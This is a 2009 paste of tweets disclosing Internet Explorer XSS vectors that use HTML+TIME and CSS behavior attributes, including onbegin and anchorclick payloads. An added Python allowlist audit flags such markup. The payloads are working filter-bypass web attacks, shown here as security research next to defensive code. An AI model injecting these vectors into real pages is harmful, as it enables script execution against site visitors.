
mario

a guest Dec 30th, 2009 1,401 Never
1. https://twitter.com/0x6D6172696F/status/7180793115:
Ever heard about IE's HTML+TIME? http://is.gd/5G60U - enabling vectors like this: 1<x/style=`behavior:url(#default#time2)`onbegin=alert(2)>

2. https://twitter.com/0x6D6172696F/status/7196312532:
More HTML+TIME - changing link targets: http://pastebin.com/f521ea4e6

3. https://twitter.com/0x6D6172696F/status/7196350903:
XSS via style attribute - it's back :) <a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>

4. https://twitter.com/0x6D6172696F/status/7197250108:
Just to have this little rascal persisted - self-executing XSS with ALL HTML elements on IE8 http://pastebin.com/f3712ff6a

More info on HTML+TIME:
 * http://msdn.microsoft.com/de-de/library/ms533099%28en-us,VS.85%29.aspx
 * http://msdn.microsoft.com/de-de/library/ms533102%28en-us,VS.85%29.aspx
 * http://www.w3.org/TR/NOTE-HTMLplusTIME
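
Added example, not part of the original paste or tweets: a defender-side allowlist audit showing why the markup above slips past filters that only block a fixed list of known event handlers or only inspect href. The policy sets (ALLOWED_ATTRS, URL_ATTRS, SAFE_SCHEMES) and the names AttributeAudit and audit are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumed policy for illustration; a real allowlist is application-specific.
ALLOWED_ATTRS = {"href", "title", "alt", "src", "class", "id"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")


class AttributeAudit(HTMLParser):
    """Collect (tag, attribute, reason) findings for markup outside the policy."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names before this call.
        for name, value in attrs:
            value = (value or "").strip().lower()
            if name.startswith("on"):
                # Prefix match covers handlers a blocklist misses, e.g. onbegin.
                reason = "event handler"
            elif name == "style" and "behavior" in value:
                # Also matches -ms-behavior; both attach IE behaviors.
                reason = "css behavior"
            elif name not in ALLOWED_ATTRS:
                # Behaviors read custom attributes such as folder=...
                reason = "attribute not allowlisted"
            elif (name in URL_ATTRS and ":" in value
                  and not value.startswith(SAFE_SCHEMES)):
                reason = "url scheme not allowlisted"
            else:
                continue
            self.findings.append((tag, name, reason))


def audit(markup):
    """Return the list of findings for one markup fragment."""
    parser = AttributeAudit()
    parser.feed(markup)
    parser.close()
    return parser.findings


# Sample input: the anchorclick markup quoted in tweet 3 above.
SAMPLE = ("<a style=behavior:url(#default#anchorclick) "
          "folder=javascript:alert(1) href=http://good.com>IE8</a>")

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Python's html.parser does not tokenize markup the way IE does (it does not treat backticks as attribute quotes, for instance), so this is an audit aid for sanitizer output, not a model of how the browser parses the input.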